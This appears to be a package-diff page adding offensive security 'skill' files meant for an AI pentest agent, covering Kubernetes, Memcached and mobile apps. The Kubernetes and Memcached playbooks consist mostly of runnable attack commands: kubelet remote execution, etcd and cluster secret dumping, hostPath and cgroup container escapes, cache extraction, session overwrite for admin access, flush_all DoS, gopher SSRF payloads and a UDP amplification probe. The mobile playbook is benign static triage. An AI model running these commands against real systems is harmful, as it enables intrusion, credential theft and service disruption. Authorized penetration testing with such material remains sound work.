npm - @aegis-scan/skills - Versions diffs - 0.5.0 → 0.5.2 - Mend

@aegis-scan/skills 0.5.0 → 0.5.2

This diff represents the content of publicly available package versions that have been released to one of the supported registries. The information contained in this diff is provided for informational purposes only and reflects changes between package versions as they appear in their respective public registries.

Files changed (345) hide show

package/skills/offensive/airecon-fork/technologies-kubernetes-pentest/SKILL.md ADDED Viewed

@@ -0,0 +1,281 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+# Kubernetes Security Assessment
+## Overview
+Kubernetes cluster security assessment: API server exposure, RBAC misconfiguration,
+etcd access, pod escape techniques, service account token abuse, and secrets enumeration.
+## Prerequisites
+```bash
+apt-get install -y kubectl
+pip install kubeletctl
+# Install kube-hunter
+pip install kube-hunter
+# Install kube-bench
+wget https://github.com/aquasecurity/kube-bench/releases/latest/download/kube-bench_linux_amd64.tar.gz
+tar -xf kube-bench_linux_amd64.tar.gz -C /usr/local/bin/
+```
+## Phase 1: External Enumeration
+### API Server Discovery
+```bash
+# Default API server port: 6443 (TLS), 8080 (insecure)
+nmap -sV -p 6443,8080,2379,2380,10250,10255 TARGET \
+  -oN /workspace/output/TARGET_k8s_nmap.txt
+# Check anonymous API access
+curl -sk https://TARGET:6443/api/v1/namespaces \
+  | tee /workspace/output/TARGET_k8s_anon_api.txt
+curl -sk https://TARGET:6443/apis | python3 -m json.tool \
+  | grep '"name"' | tee /workspace/output/TARGET_k8s_apis.txt
+# Insecure API (port 8080)
+curl -s http://TARGET:8080/api/v1/pods | python3 -m json.tool \
+  | tee /workspace/output/TARGET_k8s_insecure.txt
+```
+### Kubelet Exploitation (Port 10250/10255)
+```bash
+# Read-only kubelet API (no auth)
+curl -sk http://TARGET:10255/pods | python3 -m json.tool \
+  | tee /workspace/output/TARGET_kubelet_pods.txt
+# kubeletctl — unauthenticated kubelet
+kubeletctl -s TARGET pods --namespace default \
+  2>&1 | tee /workspace/output/TARGET_kubeletctl.txt
+# Execute commands in pod via kubelet
+kubeletctl -s TARGET exec -p <POD_NAME> -n default -c <CONTAINER> -- id
+kubeletctl -s TARGET exec -p <POD_NAME> -n default -c <CONTAINER> -- cat /var/run/secrets/kubernetes.io/serviceaccount/token
+# Run commands across all pods
+kubeletctl -s TARGET scan rce 2>&1 | tee /workspace/output/TARGET_kubelet_rce.txt
+```
+## Phase 2: API Server Anonymous Access
+```bash
+# Configure kubectl (no auth)
+kubectl config set-cluster pwned --server=https://TARGET:6443 --insecure-skip-tls-verify
+kubectl config set-context pwned --cluster=pwned
+kubectl config use-context pwned
+# Test anonymous access
+kubectl --insecure-skip-tls-verify get pods --all-namespaces \
+  2>&1 | tee /workspace/output/TARGET_k8s_pods.txt
+kubectl --insecure-skip-tls-verify get secrets --all-namespaces \
+  2>&1 | tee /workspace/output/TARGET_k8s_secrets.txt
+kubectl --insecure-skip-tls-verify get nodes \
+  2>&1 | tee /workspace/output/TARGET_k8s_nodes.txt
+# Check what anonymous can do
+kubectl --insecure-skip-tls-verify auth can-i --list \
+  2>&1 | tee /workspace/output/TARGET_k8s_permissions.txt
+```
+## Phase 3: etcd Exposure (Port 2379)
+```bash
+# Check etcd without TLS
+etcdctl --endpoints=http://TARGET:2379 member list \
+  2>&1 | tee /workspace/output/TARGET_etcd.txt
+# Dump all keys
+etcdctl --endpoints=http://TARGET:2379 get / --prefix --keys-only \
+  > /workspace/output/TARGET_etcd_keys.txt
+# Extract Kubernetes secrets from etcd
+etcdctl --endpoints=http://TARGET:2379 get /registry/secrets --prefix \
+  | strings | grep -E "password|token|key|secret" \
+  > /workspace/output/TARGET_etcd_secrets.txt
+# Get service account tokens
+etcdctl --endpoints=http://TARGET:2379 \
+  get /registry/secrets/kube-system --prefix \
+  | strings > /workspace/output/TARGET_etcd_sa_tokens.txt
+```
+## Phase 4: RBAC Misconfiguration
+```bash
+# With a service account token (from pod escape or kubelet)
+export TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+kubectl --token=$TOKEN --insecure-skip-tls-verify auth can-i --list \
+  > /workspace/output/TARGET_sa_permissions.txt
+# Check for cluster-admin role bindings
+kubectl --insecure-skip-tls-verify get clusterrolebindings \
+  -o json | python3 -m json.tool \
+  | grep -A5 '"name": "cluster-admin"' \
+  > /workspace/output/TARGET_clusteradmin_bindings.txt
+# Find wildcards in roles
+kubectl --insecure-skip-tls-verify get clusterroles -o yaml \
+  | grep -B5 '"*"' \
+  > /workspace/output/TARGET_wildcard_roles.txt
+# Check for default service account misuse
+kubectl --insecure-skip-tls-verify get rolebindings --all-namespaces \
+  | grep "default" > /workspace/output/TARGET_default_sa.txt
+```
+## Phase 5: Pod Escape — hostPath Volume
+```bash
+# Malicious pod with hostPath mount (if allowed to create pods)
+cat > /workspace/output/TARGET_escape_pod.yaml <<'YAML'
+apiVersion: v1
+kind: Pod
+metadata:
+  name: escape-pod
+  namespace: default
+spec:
+  containers:
+  - name: escape
+    image: alpine
+    command: ["/bin/sh", "-c", "sleep 3600"]
+    volumeMounts:
+    - mountPath: /host
+      name: hostfs
+  volumes:
+  - name: hostfs
+    hostPath:
+      path: /
+  restartPolicy: Never
+YAML
+kubectl --insecure-skip-tls-verify apply -f /workspace/output/TARGET_escape_pod.yaml
+# Execute in pod to access host filesystem
+kubectl --insecure-skip-tls-verify exec -it escape-pod -- \
+  chroot /host /bin/bash
+```
+## Phase 6: Privileged Container Escape
+```bash
+# Check if running in privileged container (from inside pod)
+# cat /proc/self/status | grep CapEff
+# Expected privileged: CapEff: 0000003fffffffff
+# Escape via cgroup notify_on_release (from inside privileged container)
+# mkdir /tmp/cgroup && mount -t cgroup -o rdma cgroup /tmp/cgroup
+# mkdir /tmp/cgroup/x
+# echo 1 > /tmp/cgroup/x/notify_on_release
+# echo "$(sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab)/cmd" > /tmp/cgroup/release_agent
+# echo '#!/bin/sh' > /cmd; echo "id > /output" >> /cmd; chmod +x /cmd
+# sh -c "echo \$\$ > /tmp/cgroup/x/cgroup.procs"
+# Escape via hostPID + nsenter
+# nsenter --target 1 --mount --uts --ipc --net --pid -- bash
+```
+## Phase 7: Service Account Token Abuse
+```bash
+# From inside pod — use mounted token
+TOKEN=$(cat /var/run/secrets/kubernetes.io/serviceaccount/token)
+CACERT=/var/run/secrets/kubernetes.io/serviceaccount/ca.crt
+APISERVER=https://kubernetes.default.svc
+# List pods in current namespace
+curl -s $APISERVER/api/v1/namespaces/default/pods \
+  --header "Authorization: Bearer $TOKEN" \
+  --cacert $CACERT | python3 -m json.tool
+# List secrets (if SA has permission)
+curl -s $APISERVER/api/v1/namespaces/kube-system/secrets \
+  --header "Authorization: Bearer $TOKEN" \
+  --cacert $CACERT > /workspace/output/TARGET_sa_secrets.txt
+# Create new pod via API (if allowed)
+curl -s $APISERVER/api/v1/namespaces/default/pods \
+  -X POST -H "Authorization: Bearer $TOKEN" \
+  -H "Content-Type: application/json" \
+  --cacert $CACERT \
+  -d @/workspace/output/TARGET_escape_pod.yaml
+```
+## Phase 8: Secrets Enumeration
+```bash
+# Dump all secrets (with admin token)
+kubectl --insecure-skip-tls-verify get secrets --all-namespaces \
+  -o yaml > /workspace/output/TARGET_all_secrets.yaml
+# Decode base64 secret values
+kubectl --insecure-skip-tls-verify get secret <SECRET_NAME> -n <NS> \
+  -o jsonpath='{.data}' | python3 -c \
+  "import sys,json,base64; d=json.load(sys.stdin); \
+   [print(k,'=',base64.b64decode(v).decode()) for k,v in d.items()]"
+# ConfigMaps (often contain plaintext secrets)
+kubectl --insecure-skip-tls-verify get configmaps --all-namespaces \
+  -o yaml | grep -i "password\|token\|key\|secret" \
+  > /workspace/output/TARGET_configmap_secrets.txt
+```
+## Phase 9: Automated Scanning
+```bash
+# kube-hunter (unauthenticated external scan)
+kube-hunter --remote TARGET \
+  --report json > /workspace/output/TARGET_kube_hunter.json 2>&1
+# kube-bench (CIS benchmark — run inside cluster)
+kube-bench run --targets master,node \
+  --json > /workspace/output/TARGET_kube_bench.json 2>&1
+# trivy (image vulnerability scan)
+trivy image --format json \
+  -o /workspace/output/TARGET_trivy.json \
+  <IMAGE_NAME>:latest
+```
+## Report Template
+```
+Target Cluster: TARGET
+API Server: https://TARGET:6443
+Assessment Date: <DATE>
+## Critical Findings
+- [ ] Anonymous API access — full cluster read/write
+- [ ] kubelet unauthenticated access (port 10250)
+- [ ] etcd exposed without TLS/auth
+- [ ] Privileged pod escape successful
+- [ ] Service account token with cluster-admin privileges
+## Cluster Information
+Nodes: <count>
+Namespaces: <list>
+Total Pods: <count>
+## RBAC Issues
+Overprivileged service accounts: <list>
+Wildcard permissions found in: <roles>
+## Secrets Exposed
+Total secrets: <count>
+Sensitive data found: <list>
+## Recommendations
+1. Enable RBAC and disable anonymous access
+2. Enable TLS on kubelet and etcd
+3. Use Network Policies to restrict pod communication
+4. Avoid privileged pods and hostPath mounts
+5. Enable Pod Security Standards (restricted profile)
+6. Rotate all exposed service account tokens
+7. Implement secret management (Vault, Sealed Secrets)
+```
+## Output Files
+- `/workspace/output/TARGET_k8s_nmap.txt` — Port scan results
+- `/workspace/output/TARGET_kube_hunter.json` — kube-hunter findings
+- `/workspace/output/TARGET_kube_bench.json` — CIS benchmark results
+- `/workspace/output/TARGET_all_secrets.yaml` — Dumped secrets
+indicators: kubernetes, pentest, k8s, security, kubectl, exploit, kubeletctl, etcd, exposure, rbac, misconfiguration, pod, escape, service, account, token, privileged, container, hostpath, kube-hunter, trivy

package/skills/offensive/airecon-fork/technologies-memcached/SKILL.md ADDED Viewed

@@ -0,0 +1,230 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: memcached
+description: Security testing playbook for Memcached covering unauthenticated access, data extraction, cache poisoning, SSRF-to-Memcached, and UDP reflection amplification
+---
+# Memcached Security Testing
+Memcached is a distributed memory caching system — no authentication by default. Exposure of Memcached leads to: full cache data extraction (may contain sessions, tokens, user data), cache poisoning, and UDP-based DDoS amplification.
+---
+## Reconnaissance
+### Discovery
+    # Port scanning
+    nmap -p 11211 <target> -sV --open
+    nmap -p 11211 <target> -sU --open    # UDP (amplification attacks)
+    # Port: 11211 (TCP + UDP)
+---
+## Unauthenticated Access
+    # Connect via TCP
+    nc <target> 11211
+    # Basic commands (no auth required by default):
+    stats                           # Server stats, version, uptime
+    stats items                     # Item count per slab
+    stats cachedump <slab_id> <limit>   # Dump keys in a slab
+    stats slabs                     # Memory allocation info
+    stats settings                  # Server settings
+    # Telnet (alternative):
+    telnet <target> 11211
+---
+## Data Extraction
+    # Full extraction methodology:
+    # Step 1: Get all slab IDs
+    echo "stats items" | nc <target> 11211
+    # Returns: STAT items:<slab_id>:number <count>
+    # Step 2: Dump keys from each slab
+    echo "stats cachedump <slab_id> 0" | nc <target> 11211
+    # 0 = unlimited keys; Returns: ITEM <key> [<bytes> b; <expiry> s]
+    # Step 3: Get value for each key
+    echo "get <key>" | nc <target> 11211
+    # Automated extraction script:
+    python3 -c "
+    import socket
+    host = '<target>'
+    port = 11211
+    def send(sock, cmd):
+        sock.send((cmd + '\r\n').encode())
+        import time; time.sleep(0.1)
+        data = b''
+        sock.settimeout(0.5)
+        try:
+            while True:
+                chunk = sock.recv(4096)
+                if not chunk: break
+                data += chunk
+        except socket.timeout:
+            pass
+        return data.decode()
+    s = socket.socket()
+    s.connect((host, port))
+    # Get slabs
+    slabs = [line.split(':')[1] for line in send(s, 'stats items').split('\n')
+             if 'STAT items:' in line and ':number' in line]
+    for slab in slabs:
+        keys_raw = send(s, f'stats cachedump {slab} 0')
+        keys = [line.split(' ')[1] for line in keys_raw.split('\n') if line.startswith('ITEM')]
+        for key in keys:
+            val = send(s, f'get {key}')
+            print(f'KEY: {key}')
+            print(f'VALUE: {val}')
+            print('---')
+    s.close()
+    "
+---
+## High-Value Cache Keys
+    # Common patterns to look for in extracted keys:
+    session:*                   # PHP/Python sessions
+    sess:*                      # Express.js sessions
+    user:*                      # User objects (may contain tokens)
+    auth:*                      # Authentication data
+    token:*                     # Access tokens
+    csrf:*                      # CSRF tokens
+    cache:*                     # Generic cache data
+    api:*                       # API responses
+    rate:*                      # Rate limiting counters (modify to bypass)
+    # Search for sensitive patterns in values:
+    echo "stats cachedump 1 0" | nc <target> 11211 | grep -i "session\|token\|user\|auth"
+---
+## Cache Poisoning
+    # If writable access (same as read — no auth):
+    # Overwrite any cached key:
+    echo "set <key> 0 0 <length>\r\n<malicious_value>\r\nEND" | nc <target> 11211
+    # Example: overwrite user session cache:
+    KEY="session:abc123"
+    VAL='{"user_id":1,"role":"admin","username":"admin"}'
+    printf "set $KEY 0 3600 ${#VAL}\r\n$VAL\r\nEND\r\n" | nc <target> 11211
+    # Delete a key (cache invalidation DoS):
+    echo "delete <key>" | nc <target> 11211
+    # Flush all cache (DoS):
+    echo "flush_all" | nc <target> 11211   # Immediately invalidates all items
+---
+## SSRF to Memcached
+If SSRF exists and allows TCP connections to internal Memcached:
+    # Test if SSRF can reach Memcached:
+    SSRF URL: http://localhost:11211/   # Will likely error but confirm connection
+    # Gopher SSRF to Memcached (inject commands):
+    gopher://127.0.0.1:11211/_%0d%0astats%0d%0a
+    # More complex: set a key via gopher:
+    # Encode: "set key 0 0 5\r\nhello\r\n"
+    # As gopher URL (URL-encode \r\n as %0d%0a):
+    gopher://127.0.0.1:11211/_%73%65%74%20%6b%65%79%20%30%20%30%20%35%0d%0a%68%65%6c%6c%6f%0d%0a
+---
+## Memcached Version and Stats
+    # Get version and running stats:
+    echo "version" | nc <target> 11211
+    # VERSION 1.6.17
+    echo "stats" | nc <target> 11211
+    # STAT pid 1234                   — Process ID
+    # STAT uptime 86400               — Uptime in seconds
+    # STAT curr_connections 5         — Active connections
+    # STAT total_connections 1000     — Total since start
+    # STAT cmd_get 50000              — Total get commands
+    # STAT cmd_set 10000              — Total set commands
+    # STAT get_hits 40000             — Cache hits
+    # STAT get_misses 10000           — Cache misses
+    # STAT bytes 1048576              — Memory used
+---
+## UDP Reflection / Amplification (DDoS Vector)
+Memcached UDP is an extreme amplification vector (amplification factor up to 51,000x):
+    # Check if UDP port is open:
+    nmap -p 11211 <target> -sU
+    # Amplification attack (for testing only, do NOT attack unauthorized targets):
+    # Attacker sends spoofed UDP packet (stats command, ~15 bytes) to Memcached
+    # Memcached responds with stats (~500KB) to spoofed victim IP
+    # Amplification factor: up to 51,000x
+    # DO NOT EXPLOIT without explicit authorization — this is severe DDoS
+    # Detect exposure:
+    python3 -c "
+    import socket
+    s = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
+    s.settimeout(2)
+    # Memcached UDP request header: reqId(2) seqNum(2) numDgrams(2) reserved(2) + command
+    payload = b'\x00\x01\x00\x00\x00\x01\x00\x00stats\r\n'
+    s.sendto(payload, ('<target>', 11211))
+    try:
+        data, addr = s.recvfrom(65535)
+        print(f'UDP exposed! Response: {data[:100]}')
+    except socket.timeout:
+        print('UDP not responding')
+    "
+---
+## Tools
+    # memcached-cli (Node.js)
+    npm install -g memcached-cli
+    memcached-cli <target>:11211
+    # mc — Go memcached client
+    # Direct nc/telnet are most portable
+    # Automated enumeration:
+    nmap --script memcached-info <target> -p 11211
+---
+## Pro Tips
+1. Memcached with no auth = full read/write access — extract ALL keys systematically
+2. Session tokens and JWTs cached in Memcached enable authentication bypass
+3. `flush_all` is a one-command DoS — clears all cached data (causes DB hammering)
+4. UDP port 11211 should NEVER be exposed — it's a critical DDoS amplification source
+5. Rate limiting data stored in Memcached can be deleted to bypass rate limits
+6. Web apps may cache sensitive admin responses — look for keys like `admin:*`, `config:*`
+7. Memcached SASL auth is optional and rarely configured — almost always no auth
+## Summary
+Memcached testing = `stats items` + `stats cachedump <slab> 0` + `get <key>` for full data extraction. Unauthenticated Memcached = read all cached sessions, tokens, and API responses. Session key overwrite enables account takeover without knowing credentials. UDP exposure on port 11211 is a critical DDoS amplification vector — report immediately even without extracting data.

package/skills/offensive/airecon-fork/technologies-mobile-app-pentesting/SKILL.md ADDED Viewed

@@ -0,0 +1,105 @@
+<!-- aegis-local: forked 2026-05-04 from pikpikcu/airecon@9a21453459d87eefb012ea355c79b593d0d3c0cc (MIT-licensed); attribution preserved, see ATTRIBUTION.md -->
+---
+name: mobile-app-pentesting
+description: Mobile application security testing for Android APK and iOS IPA in headless Docker environments, covering static analysis, constrained dynamic testing, and evidence-focused reporting.
+---
+# Mobile App Pentesting (Android APK / iOS IPA)
+Use this skill when the target is a mobile app package (`.apk`, `.aab`, `.ipa`) or when prompts mention Android/iOS pentesting.
+## Environment Constraints
+- AIRecon runs in Docker + CLI-first workflow.
+- GUI workflows are optional only; prefer reproducible CLI outputs.
+- iOS dynamic testing usually requires external infra (macOS + jailbroken/non-jailbroken instrumentation strategy).
+## Workflow
+1. Confirm scope and artifact.
+   - Verify app package hash and version.
+   - Record package identifier / bundle id.
+2. Run fast static triage.
+   - Manifest, permissions, exported components.
+   - Embedded secrets, API keys, debug flags, cleartext traffic.
+3. Expand to deep static analysis.
+   - Code-level sink/source tracing for auth, storage, crypto, IPC/deep links.
+4. Run dynamic checks if runtime is available.
+   - Validate TLS pinning behavior, root/jailbreak checks, auth/session handling, local storage protections.
+5. Report with reproducible evidence.
+   - Include exact command, file path, and output snippet per finding.
+## Android (APK/AAB)
+### Static Baseline
+```bash
+# Metadata and signing
+sha256sum app.apk
+apksigner verify --print-certs app.apk || true
+# Decode manifest/resources
+apktool d -f app.apk -o output/apktool_app
+# Java/Kotlin decompilation
+jadx -d output/jadx_app app.apk
+# Secrets and indicators
+strings app.apk | grep -E "AKIA|AIza|Bearer|token|password|secret" | head
+apkleaks -f app.apk -o output/apkleaks.txt || true
+apkid app.apk || true
+```
+### Priority Checks
+- Exported activities/services/receivers/providers without proper permission gating.
+- `android:debuggable="true"` in release builds.
+- Insecure network config (`usesCleartextTraffic`, permissive trust managers, weak hostname checks).
+- Hardcoded secrets, backend URLs, and test credentials.
+- Weak local storage handling (plaintext tokens/PII in shared prefs, sqlite, files).
+- Unsafe deep-link/intent handling that could enable privilege bypass.
+### Dynamic (If Device/Emulator Exists)
+```bash
+adb devices
+frida-ps -U
+objection -g <package.name> explore
+```
+- If no connected runtime is available, continue static-only and mark dynamic coverage gap explicitly.
+## iOS (IPA)
+### Static Baseline (Headless-Friendly)
+```bash
+sha256sum app.ipa
+unzip -o app.ipa -d output/ipa_unpacked
+find output/ipa_unpacked -maxdepth 4 -name Info.plist -print
+strings output/ipa_unpacked/Payload/*/*.app/* | grep -Ei "token|secret|apikey|password" | head
+```
+### Priority Checks
+- ATS configuration exceptions in `Info.plist`.
+- URL schemes / universal links exposure and unsafe handlers.
+- Hardcoded endpoints, secrets, feature flags, and debug toggles.
+- Insecure local data handling assumptions (Keychain usage validation via code paths).
+- Jailbreak detection logic weaknesses (bypass potential) noted as hypothesis unless dynamically proven.
+### Dynamic iOS Note
+- Full dynamic iOS instrumentation is typically not feasible inside this Docker engine alone.
+- If dynamic iOS testing is required, escalate to dedicated environment and keep this agent focused on static evidence + hypothesis generation.
+## Evidence and Reporting
+- For each issue, include:
+  - Affected file/component path.
+  - Reproduction command(s).
+  - Security impact and realistic attack path.
+  - Minimal remediation guidance.
+- If dynamic testing is unavailable, add explicit "Not validated dynamically" tag.